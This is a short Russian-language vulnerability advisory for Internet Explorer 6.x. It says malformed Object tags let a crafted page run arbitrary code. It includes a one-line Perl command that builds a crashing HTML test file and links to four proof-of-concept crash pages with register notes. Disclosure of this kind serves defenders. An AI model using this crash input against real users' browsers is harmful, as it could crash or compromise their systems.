Программа: Microsoft Internet Explorer 6.x

Уязвимость позволяет скомпрометировать систему пользователя. Ошибка в
обработке тега Object позволяет выполнить произвольный код на уязвимой системе
при ее посещении специально сконструированной страницы.

Пример:

perl -e ‘{print "<STYLE></STYLE>\n<OBJECT>\nBork\n"x32}’ >test.html


http://lcamtuf.coredump.cx/iedie2-1.html
(eax=0x0, instant dereference)

http://lcamtuf.coredump.cx/iedie2-2.html
(bogus esi on reload/leave)

http://lcamtuf.coredump.cx/iedie2-3.html
(page fault on browser close)

http://lcamtuf.coredump.cx/iedie2-4.html
(bogus esi on reload/leave)



Оставить мнение